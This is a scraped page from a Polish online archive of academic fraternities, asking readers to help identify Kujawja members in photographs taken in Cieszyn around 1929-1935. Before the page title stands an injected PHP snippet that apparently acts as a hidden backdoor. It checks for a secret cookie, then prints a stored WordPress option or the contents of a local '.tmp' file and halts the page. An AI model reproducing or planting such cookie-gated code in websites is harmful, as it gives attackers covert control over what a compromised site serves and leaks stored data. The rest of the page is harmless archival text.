if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Identyfikacja fotografii z Cieszyna

Od 2009 r. prezentowane są na stronach Archiwum Korporacyjnego fotografie, a szerzej także inne materialne ślady po korporacjach akademickich, które nie zostały dotychczas zidentyfikowane bądź szczegółowo opisane (vide Identyfikacja fotografii). Celem akcji jest uzupełnienie możliwie wielu brakujących informacji.

Wiele nieopisanych bądź nie w pełni opisanych fotografii znajduje się na niemal wszystkich stronach wirtualnego Muzeum Polskich Korporacji Akademickich. Od 2010 r. dodatkowo niektóre z nich oraz wiele innych nieopisanych fotografii prezentowane są w osobnych działach tworzonych zbiorczo dla identyfikacji fotografii korporacyjnych z jednego ośrodka akademickiego (Identyfikacja fotografii z Wilna, Identyfikacja fotografii z Warszawy, Identyfikacja fotografii z Lublina etc). Fotografie i insygnia korporacyjne, w przypadku których nie można określić ośrodka akademickiego, z którego pochodzą, można zobaczyć w zbiorczym zestawieniu - Identyfikacja fotografii.

Zależałoby nam na ustaleniu możliwie wielu istotnych dla opisu fotografii (bądź innych pamiątek) faktów, w szczególności nazwy korporacji ze zdjęcia, osoby/osób na nim przedstawionych, miejsca i czasu wykonania fotografii. Będziemy wdzięczni za wszelkie informacje, sugestie i przypuszczenia odnośnie prezentowanych zdjęć i innych pamiątek korporacyjnych (vide Kontakt).

_________________________________________________________________________________________

NN

1.1. Polak “Edek” - członek korporacji w Niemczech.

Fotografia korporacyjna wykonana w Akwizgranie (Aachen) w Niemczech. Pochodzi ze zbioru pamiątek po Korporacji Kujawja. Zdjęcie przedstawia korporanta, prawdopodobnie Polaka, wnioskując z podpisu pod fotografią, o imieniu “Edek”.

_________________________________________________________________________________________

Kujawici na wozie, wiosna 1930 r.

1.2. Kujawici na wozie.

Fotografia przedstawia grupę Kujawitów. Na pierwszym planie widoczny jest Henryk Malewski. Istotne byłoby ustalenie tożsamości pozostałych osób na zdjęciu.

Kujawici, Cieszyn wiosna 1930 r.

1.3. Kujawici na schodach.

Fotografia przedstawia grupę czterech Kujawitów (pierwszy od lewej Henryk Malewski). Istotne byłoby ustalenie tożsamości pozostałych osób na zdjęciu, jak także dokładnej daty i miejsca wykonania fotografii.

Poczet sztandarowy Kujawji, prawd. ok. 1935 r.

1.4. Poczet sztandarowy Kujawji.

Fotografia przedstawia poczet sztandarowy Kujawji (pierwszy z prawej Roman Kułakowski). Istotne byłoby ustalenie tożsamości pozostałych osób na zdjęciu, jak także dokładnej daty i miejsca wykonania fotografii.

Spotkanie z okazji Rady Naczelnej Związku Polskich Korporacji Akademickich w Cieszynie w 1930 r.

1.5. Spotkanie z okazji Rady Naczelnej Związku Polskich Korporacji Akademickich w Cieszynie w 1930 r.

Fotografia wykonana w trakcie spotkania z okazji Rady Naczelnej Związku Polskich Korporacji Akademickich w Cieszynie dnia 21 I 1930 r. Istotne byłoby ustalenie tożsamości osób na zdjęciu.

Kujawici przed WSGW w trakcie przerwy w czasie zajęć, Cieszyn 1929 r.

1.6. Kujawici przed WSGW w trakcie przerwy w czasie zajęć.

Istotne byłoby ustalenie tożsamości osób na zdjęciu.

Kujawici przed kwaterą Korporacji, Cieszyn 1929 r.

1.7. Kujawici przed kwaterą Korporacji I.

Fotografia przedstawia trzech Kujawitów przed kwaterą Korporacji w Cieszynie (od lewej: Zygmunt Ławrynowicz, Władysław Polański, NN). Istotne byłoby ustalenie tożsamości trzeciej osoby na zdjęciu.

‘Kujawici przed kwaterą Korporacji, Cieszyn 1929 r.

1.8. Kujawici przed kwaterą Korporacji II.

Fotografia przedstawia grupę Kujawitów przed kwaterą Korporacji w Cieszynie (od lewej stoją: Zygmunt Ławrynowicz, Marcin Bogusz (?), NN, Władysław Polański (?), siedzi NN). Istotne byłoby potwierdzenie oraz ustalenie tożsamości osób na zdjęciu.

Kujawici przy kartach, 1929 r..

1.9. Kujawici przy kartach, 1929 r.

Istotne byłoby ustalenie tożsamości osób na zdjęciu.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 30 VIII 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Identyfikacja fotografii z Cieszyna, (na:) www.archiwumkorporacyjne.pl, stan 30 VIII 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }